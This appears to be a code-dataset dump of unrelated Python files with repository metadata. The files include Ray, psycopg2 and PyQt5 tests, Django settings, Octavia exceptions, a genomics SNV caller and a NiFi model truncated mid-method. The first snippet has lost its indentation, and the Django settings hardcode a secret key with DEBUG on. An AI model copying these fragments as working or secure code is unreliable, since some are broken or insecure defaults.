from ray.tests.conftest import * # noqa
import pytest
from ray.experimental import workflow
from ray.experimental.workflow.common import WorkflowRef
@workflow.step
def incr(x):
return x + 1
def test_dynamic_workflow_ref(workflow_start_regular_shared):
# This test also shows different "style" of running workflows.
first_step = incr.step(0)
assert first_step.run("test_dynamic_workflow_ref") == 1
second_step = incr.step(WorkflowRef(first_step.id))
assert second_step.run("test_dynamic_workflow_ref") == 2
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", __file__]))
| 26
| 66
| 0.74359
|
16e2d05df23018e0d9ed127209240b6402915cf2
| 1,492
|
py
|
Python
|
tests/test_psycopg2.py
|
skriems/cherrypy-recipes
|
730188ce01511e81263b4c9645e2aa43533dbef8
|
[
"MIT"
] | null | null | null |
tests/test_psycopg2.py
|
skriems/cherrypy-recipes
|
730188ce01511e81263b4c9645e2aa43533dbef8
|
[
"MIT"
] | null | null | null |
tests/test_psycopg2.py
|
skriems/cherrypy-recipes
|
730188ce01511e81263b4c9645e2aa43533dbef8
|
[
"MIT"
] | null | null | null |
from psycopg2_app import create_app
import pytest
import webtest
@pytest.fixture(scope='module')
def app():
return webtest.TestApp(create_app())
class Testing(object):
def test_create(self, app):
resp = app.get('/create?name=test')
assert resp.status == '201 Created'
assert resp.headers['Content-Type'] == 'application/json'
assert resp.json['status'] == 'Created'
def test_read(self, app):
resp = app.get('/read/')
assert resp.status == '200 OK'
assert resp.headers['Content-Type'] == 'application/json'
assert isinstance(resp.json, list), 'list of records'
assert len(resp.json) == 1
assert resp.json[0] == dict(id=1, name='test')
def test_update(self, app):
resp = app.get('/update?name=test&newname=testing')
assert resp.status == '202 Accepted'
assert resp.headers['Content-Type'] == 'application/json'
assert resp.json['status'] == 'Accepted'
resp = app.get('/read')
assert isinstance(resp.json, list), 'list of records'
assert len(resp.json) == 1
assert resp.json[0] == dict(id=1, name='testing')
def test_delete(self, app):
resp = app.get('/delete?name=testing')
assert resp.status == '202 Accepted'
assert resp.headers['Content-Type'] == 'application/json'
resp = app.get('/read')
assert isinstance(resp.json, list), 'list of records'
assert len(resp.json) == 0
| 33.909091
| 65
| 0.613941
|
23a5d37e1c0a80c36dab215138c77e732d96887c
| 2,108
|
py
|
Python
|
2014-09-22-como-trabalhar-com-ajax-no-django/django_ajax_example/settings.py
|
vitorfs/blog-code-snippets
|
bdb88ba16d918f4a68ad7bfe1619110a8ee6614f
|
[
"MIT"
] | 3
|
2019-01-22T21:39:45.000Z
|
2021-09-11T14:22:15.000Z
|
2014-09-22-como-trabalhar-com-ajax-no-django/django_ajax_example/settings.py
|
vitorfs/blog-code-snippets
|
bdb88ba16d918f4a68ad7bfe1619110a8ee6614f
|
[
"MIT"
] | null | null | null |
2014-09-22-como-trabalhar-com-ajax-no-django/django_ajax_example/settings.py
|
vitorfs/blog-code-snippets
|
bdb88ba16d918f4a68ad7bfe1619110a8ee6614f
|
[
"MIT"
] | 2
|
2015-09-20T20:22:06.000Z
|
2021-09-11T14:22:16.000Z
|
"""
Django settings for django_ajax_example project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(__file__)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '(18xhn+e$7i35bplgtk$9u60kf^y9wy5zbc=!sdk=xshsia+hp'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_ajax_example.core',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'django_ajax_example.urls'
WSGI_APPLICATION = 'django_ajax_example.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'templates'),
)
print TEMPLATE_DIRS
| 23.685393
| 71
| 0.737666
|
6bb31e2c807fb2d8a4e386176a928a5385f59724
| 9,855
|
py
|
Python
|
octavia/common/exceptions.py
|
acdc-cloud/openstack-octavia
|
f68460ddd31f9b09d59fff876f103324078473a6
|
[
"Apache-2.0"
] | null | null | null |
octavia/common/exceptions.py
|
acdc-cloud/openstack-octavia
|
f68460ddd31f9b09d59fff876f103324078473a6
|
[
"Apache-2.0"
] | null | null | null |
octavia/common/exceptions.py
|
acdc-cloud/openstack-octavia
|
f68460ddd31f9b09d59fff876f103324078473a6
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2011 VMware, Inc, 2014 A10 Networks
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Octavia base exception handling.
"""
import six
from oslo_utils import excutils
from webob import exc
from octavia.i18n import _
class OctaviaException(Exception):
"""Base Octavia Exception.
To correctly use this class, inherit from it and define
a 'message' property. That message will get printf'd
with the keyword arguments provided to the constructor.
"""
message = _("An unknown exception occurred.")
orig_msg = None
orig_code = None
def __init__(self, *args, **kwargs):
try:
if args:
self.message = args[0]
self.orig_msg = kwargs.get('orig_msg')
self.orig_code = kwargs.get('orig_code')
super(OctaviaException, self).__init__(self.message % kwargs)
self.msg = self.message % kwargs
except Exception:
with excutils.save_and_reraise_exception() as ctxt:
if not self.use_fatal_exceptions():
ctxt.reraise = False
# at least get the core message out if something happened
super(OctaviaException, self).__init__(self.message)
def __unicode__(self):
return six.text_type(self.msg)
@staticmethod
def use_fatal_exceptions():
return False
# NOTE(blogan) Using webob exceptions here because WSME exceptions a very
# limited at this point and they do not work well in _lookup methods in the
# controllers
class APIException(exc.HTTPClientError):
msg = "Something unknown went wrong"
code = 500
def __init__(self, **kwargs):
self.msg = self.msg % kwargs
super(APIException, self).__init__(detail=self.msg)
class NotFound(APIException):
msg = _('%(resource)s %(id)s not found.')
code = 404
class PolicyForbidden(APIException):
msg = _("Policy does not allow this request to be performed.")
code = 403
class InvalidOption(APIException):
msg = _("%(value)s is not a valid option for %(option)s")
code = 400
class InvalidFilterArgument(APIException):
msg = "One or more arguments are either duplicate or invalid"
code = 400
class DisabledOption(APIException):
msg = _("The selected %(option)s is not allowed in this deployment: "
"%(value)s")
code = 400
class L7RuleValidation(APIException):
msg = _("Error parsing L7Rule: %(error)s")
code = 400
class SingleCreateDetailsMissing(APIException):
msg = _("Missing details for %(type)s object: %(name)s")
code = 400
class InvalidHMACException(OctaviaException):
message = _("HMAC hashes didn't match")
class MissingArguments(OctaviaException):
message = _("Missing arguments.")
class NetworkConfig(OctaviaException):
message = _("Unable to allocate network resource from config")
class NeedsPassphrase(OctaviaException):
message = _("Passphrase needed to decrypt key but client "
"did not provide one.")
class UnreadableCert(OctaviaException):
message = _("Could not read X509 from PEM")
class MisMatchedKey(OctaviaException):
message = _("Key and x509 certificate do not match")
class CertificateRetrievalException(APIException):
msg = _('Could not retrieve certificate: %(ref)s')
code = 400
class CertificateStorageException(OctaviaException):
message = _('Could not store certificate: %(msg)s')
class CertificateGenerationException(OctaviaException):
message = _('Could not sign the certificate request: %(msg)s')
class DuplicateListenerEntry(APIException):
msg = _("Another Listener on this Load Balancer "
"is already using protocol_port %(port)d")
code = 409
class DuplicateMemberEntry(APIException):
msg = _("Another member on this pool is already using ip %(ip_address)s "
"on protocol_port %(port)d")
code = 409
class DuplicateHealthMonitor(APIException):
msg = _("This pool already has a health monitor")
code = 409
class DuplicatePoolEntry(APIException):
msg = _("This listener already has a default pool")
code = 409
class PoolInUseByL7Policy(APIException):
msg = _("Pool %(id)s is in use by L7 policy %(l7policy_id)s")
code = 409
class ImmutableObject(APIException):
msg = _("%(resource)s %(id)s is immutable and cannot be updated.")
code = 409
class LBPendingStateError(APIException):
msg = _("Invalid state %(state)s of loadbalancer resource %(id)s")
code = 409
class TooManyL7RulesOnL7Policy(APIException):
msg = _("Too many rules on L7 policy %(id)s")
code = 409
class ComputeBuildException(OctaviaException):
message = _("Failed to build compute instance due to: %(fault)s")
class ComputeBuildQueueTimeoutException(OctaviaException):
message = _('Failed to get an amphora build slot.')
class ComputeDeleteException(OctaviaException):
message = _('Failed to delete compute instance.')
class ComputeGetException(OctaviaException):
message = _('Failed to retrieve compute instance.')
class ComputeStatusException(OctaviaException):
message = _('Failed to retrieve compute instance status.')
class ComputeGetInterfaceException(OctaviaException):
message = _('Failed to retrieve compute virtual interfaces.')
class IDAlreadyExists(APIException):
msg = _('Already an entity with that specified id.')
code = 409
class NoReadyAmphoraeException(OctaviaException):
message = _('There are not any READY amphora available.')
class GlanceNoTaggedImages(OctaviaException):
message = _("No Glance images are tagged with %(tag)s tag.")
# This is an internal use exception for the taskflow work flow
# and will not be exposed to the customer. This means it is a
# normal part of operation while waiting for compute to go active
# on the instance
class ComputeWaitTimeoutException(OctaviaException):
message = _('Waiting for compute id %(id)s to go active timeout.')
class InvalidTopology(OctaviaException):
message = _('Invalid topology specified: %(topology)s')
# L7 policy and rule exceptions
class InvalidL7PolicyAction(APIException):
msg = _('Invalid L7 Policy action specified: %(action)s')
code = 400
class InvalidL7PolicyArgs(APIException):
msg = _('Invalid L7 Policy arguments: %(msg)s')
code = 400
class InvalidURL(OctaviaException):
message = _('Not a valid URL: %(url)s')
class InvalidURLPath(APIException):
msg = _('Not a valid URLPath: %(url_path)s')
code = 400
class InvalidString(OctaviaException):
message = _('Invalid characters in %(what)s')
class InvalidRegex(OctaviaException):
message = _('Unable to parse regular expression: %(e)s')
class InvalidL7Rule(OctaviaException):
message = _('Invalid L7 Rule: %(msg)s')
class ServerGroupObjectCreateException(OctaviaException):
message = _('Failed to create server group object.')
class ServerGroupObjectDeleteException(OctaviaException):
message = _('Failed to delete server group object.')
class InvalidAmphoraOperatingSystem(OctaviaException):
message = _('Invalid amphora operating system: %(os_name)s')
class QuotaException(APIException):
msg = _('Quota has been met for resources: %(resource)s')
code = 403
class ProjectBusyException(APIException):
msg = _('Project busy. Unable to lock the project. Please try again.')
code = 503
class MissingProjectID(OctaviaException):
message = _('Missing project ID in request where one is required.')
class MissingAPIProjectID(APIException):
message = _('Missing project ID in request where one is required.')
code = 400
class InvalidSubresource(APIException):
msg = _('%(resource)s %(id)s not found.')
code = 400
class ValidationException(APIException):
msg = _('Validation failure: %(detail)s')
code = 400
class VIPValidationException(APIException):
msg = _('Validation failure: VIP must contain one of: %(objects)s.')
code = 400
class InvalidSortKey(APIException):
msg = _("Supplied sort key '%(key)s' is not valid.")
code = 400
class InvalidSortDirection(APIException):
msg = _("Supplied sort direction '%(key)s' is not valid.")
code = 400
class InvalidMarker(APIException):
msg = _("Supplied pagination marker '%(key)s' is not valid.")
code = 400
class InvalidLimit(APIException):
msg = _("Supplied pagination limit '%(key)s' is not valid.")
code = 400
class MissingVIPSecurityGroup(OctaviaException):
message = _('VIP security group is missing for load balancer: %(lb_id)s')
class ProviderNotEnabled(APIException):
msg = _("Provider '%(prov)s' is not enabled.")
code = 400
class ProviderNotFound(APIException):
msg = _("Provider '%(prov)s' was not found.")
code = 501
class ProviderDriverError(APIException):
msg = _("Provider '%(prov)s' reports error: %(user_msg)s")
code = 500
class ProviderNotImplementedError(APIException):
msg = _("Provider '%(prov)s' does not support a requested action: "
"%(user_msg)s")
code = 501
class ProviderUnsupportedOptionError(APIException):
msg = _("Provider '%(prov)s' does not support a requested option: "
"%(user_msg)s")
code = 501
| 26.92623
| 78
| 0.69934
|
1a3ee24010a46a1439a5ea25e1f1de24f44eea56
| 462
|
py
|
Python
|
fiz/dataset/integrate2.py
|
20x48/fiz
|
33972ed846d47418a2bc07d06a23277d6d53aeab
|
[
"MIT"
] | null | null | null |
fiz/dataset/integrate2.py
|
20x48/fiz
|
33972ed846d47418a2bc07d06a23277d6d53aeab
|
[
"MIT"
] | null | null | null |
fiz/dataset/integrate2.py
|
20x48/fiz
|
33972ed846d47418a2bc07d06a23277d6d53aeab
|
[
"MIT"
] | null | null | null |
# 不觉得代码顶头没有几句`import`很难受吗?
# 有条件者可使用PyPy运行。
result = set()
with open('words_alpha.txt', encoding='utf-8') as f:
for word in f.read().splitlines():
result.add(word)
with open('out.txt', 'wb') as f:
for word in sorted(result):
if len(word) >= 5: # 过滤单词!
try:
f.write(word.encode('ascii'))
f.write(b'\n')
except Exception as e:
print(e, word)
exit()
| 25.666667
| 52
| 0.508658
|
1c09ec3a892a3069c775c84e98c5411b505906e5
| 946
|
py
|
Python
|
Unidad_03/Uni3_lab_05_diccionarios.py
|
Fundamentos-de-Informatica-Python/fund-info-py
|
60c64f1ae29b833abc5a395361814c15472c0c11
|
[
"Apache-2.0"
] | 1
|
2022-03-31T12:45:42.000Z
|
2022-03-31T12:45:42.000Z
|
Unidad_03/Uni3_lab_05_diccionarios.py
|
Fundamentos-de-Informatica-Python/fund-info-py
|
60c64f1ae29b833abc5a395361814c15472c0c11
|
[
"Apache-2.0"
] | 1
|
2022-03-21T02:22:30.000Z
|
2022-03-21T02:22:30.000Z
|
Unidad_03/Uni3_lab_05_diccionarios.py
|
Fundamentos-de-Informatica-Python/fund-info-py
|
60c64f1ae29b833abc5a395361814c15472c0c11
|
[
"Apache-2.0"
] | null | null | null |
# UNIDAD 03.D28 - D29
# Diccionarios
print('\n\n---[Diapo 27]---------------------')
print('Diccionarios e Iteraciones:')
diccio = {
'naranja': 'orange',
'manzana': 'apple',
'pera': 'pear'
}
print('Se imprimen las claves: ')
for fruta in diccio:
print(fruta)
print('Se imprime con clave, valores: ')
for fruta in diccio:
print(fruta, ' ->', diccio[fruta])
print('Se imprime con clave, valores: ')
for clave, valor in diccio.items():
print(clave, ' ->', valor)
print('\n\n---[Diapo 28]---------------------')
print('Stock en mi kiosco:')
articulos = []
articulo = {'nombre': 'chicle', 'precio': 10, 'stock': 1500}
articulos.append(articulo)
articulo = {'nombre': 'alfajor', 'precio': 40, 'stock': 300}
articulos.append(articulo)
articulo = {'nombre': 'caramelo', 'precio': 2, 'stock': 10000}
articulos.append(articulo)
for art in articulos:
print(art['nombre'], '$', art['precio'], 'stock: ', art['stock'])
| 22.52381
| 69
| 0.604651
|
e22c5d25fe2359a185e4a819d945a39a7c16462f
| 4,186
|
py
|
Python
|
Conputional_Genonics/Assignment/assignment2/sample_solution/snv_caller/caller_strategies.py
|
infinityglow/Unimelb-CS-Subjects
|
07bdb49fd4c50035b7f2e80ca218ac2b620098e4
|
[
"MIT"
] | 1
|
2022-02-14T16:31:07.000Z
|
2022-02-14T16:31:07.000Z
|
Conputional_Genonics/Assignment/assignment2/sample_solution/snv_caller/caller_strategies.py
|
hidara2000/Unimelb-CS-Subjects
|
07bdb49fd4c50035b7f2e80ca218ac2b620098e4
|
[
"MIT"
] | null | null | null |
Conputional_Genonics/Assignment/assignment2/sample_solution/snv_caller/caller_strategies.py
|
hidara2000/Unimelb-CS-Subjects
|
07bdb49fd4c50035b7f2e80ca218ac2b620098e4
|
[
"MIT"
] | 1
|
2021-06-14T11:59:13.000Z
|
2021-06-14T11:59:13.000Z
|
from Bio import SeqIO, Seq
import re
import itertools
class SubReference():
def __init__(self,reference_file):
reference = next(SeqIO.parse(reference_file,'fasta'))
(self.reference_name,self.min_pos,self.max_pos) = self._parse_label(reference.name)
self._reference_seq = reference.seq
def is_valid_pos(self,pos):
return self.min_pos <= pos < self.max_pos
def _parse_label(self,label):
result = re.match('(?P<ref>\w*):(?P<min>\d*)-(?P<max>\d*)', label)
zero_based_min = int(result.group('min'))-1
zero_based_max = int(result.group('max'))-1
return (result.group('ref'),zero_based_min,zero_based_max)
def __getitem__(self,sliceobj):
sliced_bases = None
if isinstance(sliceobj, int):
sliced_bases= self._reference_seq[sliceobj-self.min_pos]
elif isinstance(sliceobj, slice):
new_slice = slice(sliceobj.start-self.min_pos,sliceobj.stop-self.min_pos,sliceobj.step)
sliced_bases= self._reference_seq[new_slice]
else:
raise TypeError
return sliced_bases.upper()
def __len__(self):
return self.max_pos+1
class HeterozygoteStrategy():
def __call__(self,pileupcolumn,base_probs):
filtered_bases = self._heterogeneous_bases(base_probs)
if len(filtered_bases.keys()) < 2:
filtered_bases = {}
return filtered_bases
def format_output(self,reference_name, pos, called_snvs):
output = ''
for base, stats in called_snvs.iteritems():
output += self._format(reference_name,str(pos),base,stats['prob'],stats['avg'])
return output
def _heterogeneous_bases(self,base_probs):
return dict((base,probs)for base, probs in base_probs.iteritems() if probs['prob'] >= 0.2 and probs['prob'] <= 0.8)
def _format(self,reference, pos, base,prob,avg):
return "{reference}\t{pos}\t{base}\t{prob}\t{avg}\n".format(reference=reference,pos=pos,base=base,prob=prob,avg=avg)
class ReferenceStrategy():
def __init__(self,reference_obj):
self.reference = reference_obj
self._written_header = False
def __call__(self,pileupcolumn,base_probs, frequency_cutoff=0.2):
filtered_probs = {}
reference_pos = pileupcolumn.pos
if self.reference.is_valid_pos(reference_pos):
reference_base = self.reference[reference_pos]
for base,probs in base_probs.iteritems():
if probs['prob'] >= frequency_cutoff:
filtered_probs[base]=probs
if not any(map(lambda base_tuple: base_tuple[0] != reference_base,filtered_probs)):
filtered_probs = {}
return filtered_probs
def format_output(self,reference_name, pos, called_snvs):
if not any(called_snvs):
return ''
output = ''
if not self._written_header:
self._written_header = True
output+= '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\tSAMPLE\n'
chrom_num = re.search('\d+',reference_name).group(0)
ref = self.reference[pos]
alts = []
freqs = []
quals = []
for base, stats in sorted(called_snvs.iteritems(),key=lambda base_tuple: base_tuple[0]):
if base != ref:
alts.append(base)
freqs.append(stats['prob'])
quals.append(stats['avg'])
all_found_bases = called_snvs.keys()
genotypes = self._format_genotypes(all_found_bases,ref,alts)
output += self._format(chrom_num,pos,ref,alts,quals,freqs,genotypes)
return output
def _format_genotypes(self,all_found_bases,ref,alts):
positions = []
for base in all_found_bases:
if base == ref:
positions.append(str(0))
else:
positions.append(str(alts.index(base)+1))
if len(positions) == 1:
return '{}/{}'.format(positions[0],positions[0])
else:
return ','.join(map(lambda x: '/'.join(sorted(x)),itertools.combinations(positions,2)))
def _format(self,chrom_num,pos,ref,alts,quals,freqs,sample,identifier='.',filt='PASS',form='GT'):
info = 'AF={}'.format(','.join(map(lambda x: str(x),freqs)))
alt = ','.join(alts)
return '{chrom_num}\t{pos}\t{id}\t{ref}\t{alt}\t{qual}\t{filter}\t{info}\t{format}\t{sample}\n'\
.format(chrom_num=chrom_num,pos=pos,id=identifier,ref=ref,alt=alt,qual=quals[0],filter=filt,info=info,format=form,sample=sample)
| 36.086207
| 134
| 0.688247
|
b03fc8c96fa1e01b13ada555b8fb38f1b961edd8
| 1,248
|
py
|
Python
|
tests/old_suite/interactive/test_pyqt5.py
|
yoda-vid/pyinstaller
|
419f349dad721a253b19d9c596e251818132d6ba
|
[
"Apache-2.0"
] | 2
|
2017-02-08T22:22:09.000Z
|
2020-10-08T12:28:36.000Z
|
tests/old_suite/interactive/test_pyqt5.py
|
416426/pyinstaller
|
0f2b2e921433ab5a510c7efdb21d9c1d7cfbc645
|
[
"Apache-2.0"
] | 3
|
2020-04-06T15:48:37.000Z
|
2021-03-23T10:22:21.000Z
|
tests/old_suite/interactive/test_pyqt5.py
|
416426/pyinstaller
|
0f2b2e921433ab5a510c7efdb21d9c1d7cfbc645
|
[
"Apache-2.0"
] | 4
|
2018-06-04T20:40:37.000Z
|
2020-10-13T22:38:40.000Z
|
#-----------------------------------------------------------------------------
# Copyright (c) 2013-2021, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------
import sys
from PyQt5 import Qt
from PyQt5 import QtCore
from PyQt5 import QtGui
from PyQt5 import QtWidgets
def main():
app = QtWidgets.QApplication(sys.argv)
read_formats = ', '.join([str(format).lower() \
for format in QtGui.QImageReader.supportedImageFormats()])
print(("Qt5 plugin paths: " + str(list(app.libraryPaths()))))
print(("Qt5 image read support: " + read_formats))
print(('Qt5 Libraries path: ' + \
str(QtCore.QLibraryInfo.location(QtCore.QLibraryInfo.LibrariesPath))))
label = QtWidgets.QLabel("Hello World from PyQt5", None)
label.setWindowTitle("Hello World from PyQt5")
label.resize(300, 300)
label.show()
app.exec_()
if __name__ == "__main__":
main()
| 32.842105
| 81
| 0.619391
|
89589edc7eb65d6549b33ac352eeab4e5e039e21
| 1,740
|
py
|
Python
|
test/test_project.py
|
LuJie0403/iterlife-pybase
|
d85444826365677938c58dc68bf7d30516f02e4d
|
[
"MIT"
] | 89
|
2018-05-31T06:51:36.000Z
|
2022-02-21T06:16:36.000Z
|
test/test_project.py
|
LuJie0403/iterlife-pybase
|
d85444826365677938c58dc68bf7d30516f02e4d
|
[
"MIT"
] | 235
|
2018-05-21T03:32:37.000Z
|
2021-07-20T08:45:09.000Z
|
test/test_project.py
|
LuJie0403/iterlife-pybase
|
d85444826365677938c58dc68bf7d30516f02e4d
|
[
"MIT"
] | 20
|
2018-05-29T14:26:13.000Z
|
2022-02-21T06:16:50.000Z
|
# coding=utf-8
import os
import shutil
import pytest
from fishbase.fish_project import init_project_by_yml
# 2018.6.27 v1.0.14 #73 create by Jia ChunYing
class TestProject(object):
# 2021.6.22, #294, 修复小错误
def test_load_bad_01(self):
"""
empty file
"""
base_dir = os.path.dirname(os.path.abspath(__file__))
target_file = base_dir + os.sep + 'test_project_with_empty_file.yaml'
with open(target_file, 'wb') as f:
f.close()
with pytest.raises(KeyError) as e:
init_project_by_yml(target_file, '.')
exec_msg = e.value.args[0]
assert exec_msg == 'project config format Error: fail to load'
# os.remove(target_file)
def test_init_project_by_yml(self):
# define yml string
package_yml = '''
project: hellopackage
tree:
- README.md
- requirements.txt
- setup.py
- MANIFEST.in
- hellopackage: # project name
- __init__.py
- test: # unittest file
- __init__.py
- demo: # usage demo
- __init__.py
- doc: # documents
'''
# init project by yml
init_project_by_yml(package_yml, '.')
result = os.listdir('./hellopackage')
expect = ['demo', 'requirements.txt', 'test', 'MANIFEST.in', 'hellopackage', 'README.md', 'setup.py', 'doc']
for ele in expect:
assert ele in result
# 删除临时文件
shutil.rmtree('./hellopackage')
| 32.222222
| 116
| 0.506322
|
2036caa325f480ed36b0e7154890d44d049798a1
| 13,619
|
py
|
Python
|
nipyapi/nifi/models/listing_request_dto.py
|
Paul-Verardi/nipyapi
|
7a709611d9cf30e4ce8943db4d4dd617f2f7c81c
|
[
"Apache-2.0"
] | null | null | null |
nipyapi/nifi/models/listing_request_dto.py
|
Paul-Verardi/nipyapi
|
7a709611d9cf30e4ce8943db4d4dd617f2f7c81c
|
[
"Apache-2.0"
] | 1
|
2018-11-13T21:01:33.000Z
|
2018-11-13T21:01:33.000Z
|
nipyapi/nifi/models/listing_request_dto.py
|
Paul-Verardi/nipyapi
|
7a709611d9cf30e4ce8943db4d4dd617f2f7c81c
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
NiFi Rest Api
The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service.
OpenAPI spec version: 1.7.1
Contact: dev@nifi.apache.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class ListingRequestDTO(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'uri': 'str',
'submission_time': 'str',
'last_updated': 'str',
'percent_completed': 'int',
'finished': 'bool',
'failure_reason': 'str',
'max_results': 'int',
'state': 'str',
'queue_size': 'QueueSizeDTO',
'flow_file_summaries': 'list[FlowFileSummaryDTO]',
'source_running': 'bool',
'destination_running': 'bool'
}
attribute_map = {
'id': 'id',
'uri': 'uri',
'submission_time': 'submissionTime',
'last_updated': 'lastUpdated',
'percent_completed': 'percentCompleted',
'finished': 'finished',
'failure_reason': 'failureReason',
'max_results': 'maxResults',
'state': 'state',
'queue_size': 'queueSize',
'flow_file_summaries': 'flowFileSummaries',
'source_running': 'sourceRunning',
'destination_running': 'destinationRunning'
}
def __init__(self, id=None, uri=None, submission_time=None, last_updated=None, percent_completed=None, finished=None, failure_reason=None, max_results=None, state=None, queue_size=None, flow_file_summaries=None, source_running=None, destination_running=None):
"""
ListingRequestDTO - a model defined in Swagger
"""
self._id = None
self._uri = None
self._submission_time = None
self._last_updated = None
self._percent_completed = None
self._finished = None
self._failure_reason = None
self._max_results = None
self._state = None
self._queue_size = None
self._flow_file_summaries = None
self._source_running = None
self._destination_running = None
if id is not None:
self.id = id
if uri is not None:
self.uri = uri
if submission_time is not None:
self.submission_time = submission_time
if last_updated is not None:
self.last_updated = last_updated
if percent_completed is not None:
self.percent_completed = percent_completed
if finished is not None:
self.finished = finished
if failure_reason is not None:
self.failure_reason = failure_reason
if max_results is not None:
self.max_results = max_results
if state is not None:
self.state = state
if queue_size is not None:
self.queue_size = queue_size
if flow_file_summaries is not None:
self.flow_file_summaries = flow_file_summaries
if source_running is not None:
self.source_running = source_running
if destination_running is not None:
self.destination_running = destination_running
@property
def id(self):
"""
Gets the id of this ListingRequestDTO.
The id for this listing request.
:return: The id of this ListingRequestDTO.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this ListingRequestDTO.
The id for this listing request.
:param id: The id of this ListingRequestDTO.
:type: str
"""
self._id = id
@property
def uri(self):
"""
Gets the uri of this ListingRequestDTO.
The URI for future requests to this listing request.
:return: The uri of this ListingRequestDTO.
:rtype: str
"""
return self._uri
@uri.setter
def uri(self, uri):
"""
Sets the uri of this ListingRequestDTO.
The URI for future requests to this listing request.
:param uri: The uri of this ListingRequestDTO.
:type: str
"""
self._uri = uri
@property
def submission_time(self):
"""
Gets the submission_time of this ListingRequestDTO.
The timestamp when the query was submitted.
:return: The submission_time of this ListingRequestDTO.
:rtype: str
"""
return self._submission_time
@submission_time.setter
def submission_time(self, submission_time):
"""
Sets the submission_time of this ListingRequestDTO.
The timestamp when the query was submitted.
:param submission_time: The submission_time of this ListingRequestDTO.
:type: str
"""
self._submission_time = submission_time
@property
def last_updated(self):
"""
Gets the last_updated of this ListingRequestDTO.
The last time this listing request was updated.
:return: The last_updated of this ListingRequestDTO.
:rtype: str
"""
return self._last_updated
@last_updated.setter
def last_updated(self, last_updated):
"""
Sets the last_updated of this ListingRequestDTO.
The last time this listing request was updated.
:param last_updated: The last_updated of this ListingRequestDTO.
:type: str
"""
self._last_updated = last_updated
@property
def percent_completed(self):
"""
Gets the percent_completed of this ListingRequestDTO.
The current percent complete.
:return: The percent_completed of this ListingRequestDTO.
:rtype: int
"""
return self._percent_completed
@percent_completed.setter
def percent_completed(self, percent_completed):
"""
Sets the percent_completed of this ListingRequestDTO.
The current percent complete.
:param percent_completed: The percent_completed of this ListingRequestDTO.
:type: int
"""
self._percent_completed = percent_completed
@property
def finished(self):
"""
Gets the finished of this ListingRequestDTO.
Whether the query has finished.
:return: The finished of this ListingRequestDTO.
:rtype: bool
"""
return self._finished
@finished.setter
def finished(self, finished):
"""
Sets the finished of this ListingRequestDTO.
Whether the query has finished.
:param finished: The finished of this ListingRequestDTO.
:type: bool
"""
self._finished = finished
@property
def failure_reason(self):
"""
Gets the failure_reason of this ListingRequestDTO.
The reason, if any, that this listing request failed.
:return: The failure_reason of this ListingRequestDTO.
:rtype: str
"""
return self._failure_reason
@failure_reason.setter
def failure_reason(self, failure_reason):
"""
Sets the failure_reason of this ListingRequestDTO.
The reason, if any, that this listing request failed.
:param failure_reason: The failure_reason of this ListingRequestDTO.
:type: str
"""
self._failure_reason = failure_reason
@property
def max_results(self):
"""
Gets the max_results of this ListingRequestDTO.
The maximum number of FlowFileSummary objects to return
:return: The max_results of this ListingRequestDTO.
:rtype: int
"""
return self._max_results
@max_results.setter
def max_results(self, max_results):
"""
Sets the max_results of this ListingRequestDTO.
The maximum number of FlowFileSummary objects to return
:param max_results: The max_results of this ListingRequestDTO.
:type: int
"""
self._max_results = max_results
@property
def state(self):
"""
Gets the state of this ListingRequestDTO.
The current state of the listing request.
:return: The state of this ListingRequestDTO.
:rtype: str
"""
return self._state
@state.setter
def state(self, state):
"""
